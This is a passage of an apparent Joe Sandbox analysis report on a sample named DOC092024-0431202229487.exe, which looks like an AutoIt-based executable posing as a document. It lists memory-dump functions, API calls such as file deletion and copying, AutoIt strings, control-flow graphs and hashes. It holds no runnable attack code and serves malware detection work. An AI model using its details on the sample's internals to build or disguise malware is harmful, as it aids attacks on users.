                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                        • String ID: 9As$@
                                                        • API String ID: 3896587723-2553832589
                                                        • Opcode ID: babd56570702135fa05225d0adff1ca6c73196e8fa1eed13af28d374e79acf83
                                                        • Instruction ID: c7f8917f0b50448399c38e37e324a55d19eb937607dee72f46c4ed36a623df83
                                                        • Opcode Fuzzy Hash: babd56570702135fa05225d0adff1ca6c73196e8fa1eed13af28d374e79acf83
                                                        • Instruction Fuzzy Hash: 50221671E042059BEF299F68DC95BFD7B61EF02324F248229E521AB2E2C73D8D50D752
                                                        Function 0073FBBF Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit
                                                        • String ID:
                                                        • API String ID: 3074181302-0
                                                        • Opcode ID: ce40794c4a4879adc4034c1c97a9eca3a70192e61a6b37528df32c4b7d53c204
                                                        • Instruction ID: 45da50c4ea742afec993d232959403f8c5d947f405c3a44257d6787a305c3ef2
                                                        • Opcode Fuzzy Hash: ce40794c4a4879adc4034c1c97a9eca3a70192e61a6b37528df32c4b7d53c204
                                                        • Instruction Fuzzy Hash: E1325870E04245DFEB218F68C844BBDBBB1AF46350F28816AE9959F293C77C9C41C7A5
                                                        Function 007601E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _wcscpy.LIBCMT ref: 0076026A
                                                        • _wcschr.LIBCMT ref: 00760278
                                                        • _wcscpy.LIBCMT ref: 0076028F
                                                        • _wcscat.LIBCMT ref: 0076029E
                                                        • _wcscat.LIBCMT ref: 007602BC
                                                        • _wcscpy.LIBCMT ref: 007602DD
                                                        • __wsplitpath.LIBCMT ref: 007603BA
                                                        • _wcscpy.LIBCMT ref: 007603DF
                                                        • _wcscpy.LIBCMT ref: 007603F1
                                                        • _wcscpy.LIBCMT ref: 00760406
                                                        • _wcscat.LIBCMT ref: 0076041B
                                                        • _wcscat.LIBCMT ref: 0076042D
                                                        • _wcscat.LIBCMT ref: 00760442
                                                          • Part of subcall function 0075C890: _wcscmp.LIBCMT ref: 0075C92A
                                                          • Part of subcall function 0075C890: __wsplitpath.LIBCMT ref: 0075C96F
                                                          • Part of subcall function 0075C890: _wcscpy.LIBCMT ref: 0075C982
                                                          • Part of subcall function 0075C890: _wcscat.LIBCMT ref: 0075C995
                                                          • Part of subcall function 0075C890: __wsplitpath.LIBCMT ref: 0075C9BA
                                                          • Part of subcall function 0075C890: _wcscat.LIBCMT ref: 0075C9D0
                                                          • Part of subcall function 0075C890: _wcscat.LIBCMT ref: 0075C9E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                        • API String ID: 2955681530-2806939583
                                                        • Opcode ID: c7c1c5018eaa96c58865310e25ead7af6a4f70ca8474574f966fcf7cd671dab8
                                                        • Instruction ID: e558c7f6047f2c28a135e4ffe00149c4e3c803a3dafa5096c95850222be9032f
                                                        • Opcode Fuzzy Hash: c7c1c5018eaa96c58865310e25ead7af6a4f70ca8474574f966fcf7cd671dab8
                                                        • Instruction Fuzzy Hash: D2918F71504745EFDB20EF54C859F9BB3E8AF84310F04485DF9469B292EB38EA48CB92
                                                        Function 0072E975 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 170COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0072EA39
                                                        • __wsplitpath.LIBCMT ref: 0072EA56
                                                          • Part of subcall function 0073297D: __wsplitpath_helper.LIBCMT ref: 007329BD
                                                        • _wcsncat.LIBCMT ref: 0072EA69
                                                        • __makepath.LIBCMT ref: 0072EA85
                                                          • Part of subcall function 00732BFF: __wmakepath_s.LIBCMT ref: 00732C13
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                        • _wcscpy.LIBCMT ref: 0072EABE
                                                          • Part of subcall function 0072EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0072EADA,?,?), ref: 0072EB27
                                                        • _wcscat.LIBCMT ref: 007832FC
                                                        • _wcscat.LIBCMT ref: 00783334
                                                        • _wcsncpy.LIBCMT ref: 00783370
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                        • String ID: '/u$Include$\$"}
                                                        • API String ID: 1213536620-3302818544
                                                        • Opcode ID: 5d3619d4134598dbd80db964f87edfc8b883ce6e4244ac9c7c4863ee6bba4032
                                                        • Instruction ID: 600756bfec79941fad4945e3ae77a038b3f1b1195105e6c19180f9ad6646bcdf
                                                        • Opcode Fuzzy Hash: 5d3619d4134598dbd80db964f87edfc8b883ce6e4244ac9c7c4863ee6bba4032
                                                        • Instruction Fuzzy Hash: 5F515EB1406340DBC315EF69EC85C96B7F8FB69300B80852FF54593262EB7C9646CB6A
                                                        Function 00714257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,00000000,00000001,00000000), ref: 0071428C
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00731BC7: __wcsicmp_l.LIBCMT ref: 00731C50
                                                        • _wcscpy.LIBCMT ref: 007143C0
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0078214E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\DOC092024-0431202229487.exe$CMDLINE$CMDLINERAW
                                                        • API String ID: 861526374-449234240
                                                        • Opcode ID: b30eb9444e892ab2e3fc50c21aecb0da27aa5c770f8c4384f362056ee724ef8d
                                                        • Instruction ID: 8b0eb99260802e2fc6cc77a8e642023b2b195e8b9a3b4ea02d59598b2dd488f0
                                                        • Opcode Fuzzy Hash: b30eb9444e892ab2e3fc50c21aecb0da27aa5c770f8c4384f362056ee724ef8d
                                                        • Instruction Fuzzy Hash: 4E8194B2800119EACB15EBE4DC5AEEFB778AF45350F500016F541B70C2EF686A85CBB1
                                                        Function 0075C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1204 75c890-75c940 call 740650 call 73010a call 714bce call 75c6a0 call 7141a7 call 732203 1217 75c946-75c94d call 75ce59 1204->1217 1218 75c9f3-75c9fa call 75ce59 1204->1218 1223 75c953-75c9f1 call 73297d call 731943 call 731914 call 73297d call 731914 * 2 1217->1223 1224 75c9fc-75c9fe 1217->1224 1218->1224 1225 75ca03 1218->1225 1228 75ca06-75cac2 call 71417d * 8 call 75d009 call 734129 1223->1228 1227 75cc53-75cc54 1224->1227 1225->1228 1231 75cc71-75cc7f call 714fd2 1227->1231 1263 75cac4-75cac6 1228->1263 1264 75cacb-75cae6 call 75c6e4 1228->1264 1263->1227 1267 75caec-75caf4 1264->1267 1268 75cb78-75cb84 call 734274 1264->1268 1269 75caf6-75cafa 1267->1269 1270 75cafc 1267->1270 1275 75cb86-75cb95 DeleteFileW 1268->1275 1276 75cb9a-75cb9e 1268->1276 1272 75cb01-75cb1f call 71417d 1269->1272 1270->1272 1280 75cb21-75cb27 1272->1280 1281 75cb49-75cb5f call 75c07d call 73373e 1272->1281 1275->1227 1277 75cba4-75cc1b call 75d10c call 75d134 call 75c251 1276->1277 1278 75cc2e-75cc42 CopyFileW 1276->1278 1284 75cc56-75cc6c DeleteFileW call 75cfc8 1277->1284 1300 75cc1d-75cc2c DeleteFileW 1277->1300 1283 75cc44-75cc51 DeleteFileW 1278->1283 1278->1284 1285 75cb29-75cb3c call 75c81a 1280->1285 1297 75cb64-75cb6f 1281->1297 1283->1227 1284->1231 1295 75cb3e-75cb47 1285->1295 1295->1281 1297->1267 1299 75cb75 1297->1299 1299->1268 1300->1227
                                                        APIs
                                                          • Part of subcall function 0075C6A0: __time64.LIBCMT ref: 0075C6AA
                                                          • Part of subcall function 007141A7: _fseek.LIBCMT ref: 007141BF
                                                        • __wsplitpath.LIBCMT ref: 0075C96F
                                                          • Part of subcall function 0073297D: __wsplitpath_helper.LIBCMT ref: 007329BD
                                                        • _wcscpy.LIBCMT ref: 0075C982
                                                        • _wcscat.LIBCMT ref: 0075C995
                                                        • __wsplitpath.LIBCMT ref: 0075C9BA
                                                        • _wcscat.LIBCMT ref: 0075C9D0
                                                        • _wcscat.LIBCMT ref: 0075C9E3
                                                          • Part of subcall function 0075C6E4: _memmove.LIBCMT ref: 0075C71D
                                                          • Part of subcall function 0075C6E4: _memmove.LIBCMT ref: 0075C72C
                                                        • _wcscmp.LIBCMT ref: 0075C92A
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF49
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF5C
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0075CB8D
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0075CC24
                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0075CC3A
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0075CC4B
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0075CC5D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                        • String ID:
                                                        • API String ID: 152968663-0
                                                        • Opcode ID: 983fe5de8511483df0d27681157d7782e4abd0de02bf7219348056ec1e662ef1
                                                        • Instruction ID: 5fc7874fb0c3316f162dd3a0d2fa4bc93cac1ba6c0d425df6e8ebe2914746f9c
                                                        • Opcode Fuzzy Hash: 983fe5de8511483df0d27681157d7782e4abd0de02bf7219348056ec1e662ef1
                                                        • Instruction Fuzzy Hash: 16C13CB190021DAEDF11DFA5CC85FEEBBBDEF48310F0040AAB609E6151D7749A898F65
                                                        Function 007130A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007130B0
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007130BF
                                                        • LoadIconW.USER32(00000063), ref: 007130D5
                                                        • LoadIconW.USER32(000000A4), ref: 007130E7
                                                        • LoadIconW.USER32(000000A2), ref: 007130F9
                                                          • Part of subcall function 0071318A: LoadImageW.USER32(00710000,00000063,00000001,00000010,00000010,00000000), ref: 007131AE
                                                        • RegisterClassExW.USER32(?), ref: 00713167
                                                          • Part of subcall function 00712F58: GetSysColorBrush.USER32(0000000F), ref: 00712F8B
                                                          • Part of subcall function 00712F58: RegisterClassExW.USER32(00000030), ref: 00712FB5
                                                          • Part of subcall function 00712F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00712FC6
                                                          • Part of subcall function 00712F58: LoadIconW.USER32(000000A9), ref: 00713009
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 2880975755-4155596026
                                                        • Opcode ID: b6a4451f235c2e35feb224b38527ea8fe7f9414661b1c4f220e85a013ba50f02
                                                        • Instruction ID: 02efe7e87766b15204163c81cbe524164b3b099098d11a0cf4568f3ad9706d22
                                                        • Opcode Fuzzy Hash: b6a4451f235c2e35feb224b38527ea8fe7f9414661b1c4f220e85a013ba50f02
                                                        • Instruction Fuzzy Hash: 19213370E01308BBDB10DFA9ED49B99BFF5EB48310F50812BE614A22A1D77945818FA9
                                                        Function 00712F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00712F8B
                                                        • RegisterClassExW.USER32(00000030), ref: 00712FB5
                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00712FC6
                                                        • LoadIconW.USER32(000000A9), ref: 00713009
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 975902462-1005189915
                                                        • Opcode ID: a425da5379129f5d5d7a9758f4f62b7cbf85d6144b89b90b59803135701f73e7
                                                        • Instruction ID: 16a618e8f2b9236449edc8a53bdd268b2742316f4375c2bedb39fa40a15197a0
                                                        • Opcode Fuzzy Hash: a425da5379129f5d5d7a9758f4f62b7cbf85d6144b89b90b59803135701f73e7
                                                        • Instruction Fuzzy Hash: A121E2B5901318AFDB10DFA4E989BCDBBB4FB08710F00811AF611A62A0D7B80545DFA9
                                                        Function 0076C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1369 76c8b7-76c8f1 1370 76c8f7-76c8fa 1369->1370 1371 76ccfb-76ccff 1369->1371 1370->1371 1373 76c900-76c903 1370->1373 1372 76cd04-76cd05 1371->1372 1374 76cd06 call 76c235 1372->1374 1373->1371 1375 76c909-76c912 call 76cff8 1373->1375 1379 76cd0b-76cd0f 1374->1379 1380 76c914-76c920 1375->1380 1381 76c925-76c92e call 75be14 1375->1381 1380->1374 1384 76c934-76c93a 1381->1384 1385 76cc61-76cc6c call 71d2c0 1381->1385 1386 76c940 1384->1386 1387 76c93c-76c93e 1384->1387 1393 76cc6e-76cc72 1385->1393 1394 76cca9-76ccb4 call 71d2c0 1385->1394 1389 76c942-76c94a 1386->1389 1387->1389 1391 76c950-76c967 call 74abf3 1389->1391 1392 76ccec-76ccf4 1389->1392 1403 76c973-76c97f 1391->1403 1404 76c969-76c96e 1391->1404 1392->1371 1397 76cc74-76cc76 1393->1397 1398 76cc78 1393->1398 1394->1392 1402 76ccb6-76ccba 1394->1402 1401 76cc7a-76cc98 call 72d6b4 call 7597b6 1397->1401 1398->1401 1420 76cc99-76cca7 call 75d7e4 1401->1420 1407 76ccc0 1402->1407 1408 76ccbc-76ccbe 1402->1408 1409 76c981-76c98d 1403->1409 1410 76c9ce-76c9f9 call 72fa89 1403->1410 1404->1372 1413 76ccc2-76ccea call 72d6b4 call 75503c call 722570 1407->1413 1408->1413 1409->1410 1414 76c98f-76c99c call 74a8c8 1409->1414 1421 76c9fb-76ca16 call 72ac65 1410->1421 1422 76ca18-76ca1a 1410->1422 1413->1420 1419 76c9a1-76c9a6 1414->1419 1419->1410 1424 76c9a8-76c9af 1419->1424 1420->1379 1427 76ca1d-76ca24 1421->1427 1422->1427 1430 76c9b1-76c9b8 1424->1430 1431 76c9be-76c9c5 1424->1431 1434 76ca26-76ca30 1427->1434 1435 76ca52-76ca59 1427->1435 1430->1431 1438 76c9ba 1430->1438 1431->1410 1441 76c9c7 1431->1441 1436 76ca32-76ca48 call 74a25b 1434->1436 1439 76cadf-76caec 1435->1439 1440 76ca5f-76ca66 1435->1440 1451 76ca4a-76ca50 1436->1451 1438->1431 1445 76caee-76caf8 1439->1445 1446 76cafb-76cb28 VariantInit call 731970 1439->1446 1440->1439 1444 76ca68-76ca7b 1440->1444 1441->1410 1449 76ca7c-76ca84 1444->1449 1445->1446 1454 76cb2d-76cb30 1446->1454 1455 76cb2a-76cb2b 1446->1455 1452 76ca86-76caa3 VariantClear 1449->1452 1453 76cad1-76cada 1449->1453 1451->1435 1456 76caa5-76cab9 SysAllocString 1452->1456 1457 76cabc-76cacc 1452->1457 1453->1449 1458 76cadc 1453->1458 1459 76cb31-76cb44 call 751321 1454->1459 1455->1459 1456->1457 1457->1453 1460 76cace 1457->1460 1458->1439 1461 76cb47-76cb4c 1459->1461 1460->1453 1462 76cb4e-76cb52 1461->1462 1463 76cb8a-76cb8c 1461->1463 1464 76cb54-76cb86 1462->1464 1465 76cba1-76cba5 1462->1465 1466 76cbb4-76cbd5 call 75d7e4 call 75a6f6 1463->1466 1467 76cb8e-76cb95 1463->1467 1464->1463 1470 76cba6-76cbaf call 76c235 1465->1470 1475 76cc41-76cc50 VariantClear 1466->1475 1479 76cbd7-76cbe0 1466->1479 1467->1465 1469 76cb97-76cb9f 1467->1469 1469->1470 1470->1475 1477 76cc52-76cc55 call 751693 1475->1477 1478 76cc5a-76cc5c 1475->1478 1477->1478 1478->1379 1481 76cbe2-76cbef 1479->1481 1482 76cbf1-76cbf8 1481->1482 1483 76cc38-76cc3f 1481->1483 1484 76cc26-76cc2a 1482->1484 1485 76cbfa-76cc0a 1482->1485 1483->1475 1483->1481 1487 76cc30 1484->1487 1488 76cc2c-76cc2e 1484->1488 1485->1483 1486 76cc0c-76cc14 1485->1486 1486->1484 1490 76cc16-76cc1c 1486->1490 1489 76cc32-76cc33 call 75a6f6 1487->1489 1488->1489 1489->1483 1490->1484 1492 76cc1e-76cc24 1490->1492 1492->1483 1492->1484
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 356c0f8af9236080ad1f4d4f45906e01c93419aa33d1f135e3fc77bd205ecaf5
                                                        • Instruction ID: 164b7f6fbe6b660ae71002aa0cc545a989b83e79203a5047fa400909240c54d5
                                                        • Opcode Fuzzy Hash: 356c0f8af9236080ad1f4d4f45906e01c93419aa33d1f135e3fc77bd205ecaf5
                                                        • Instruction Fuzzy Hash: 9FE1B5B1A00219AFDF11DFA4D845ABE77B5FF48354F148029FD8AA7281D778AD41CBA0
                                                        Function 00713DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
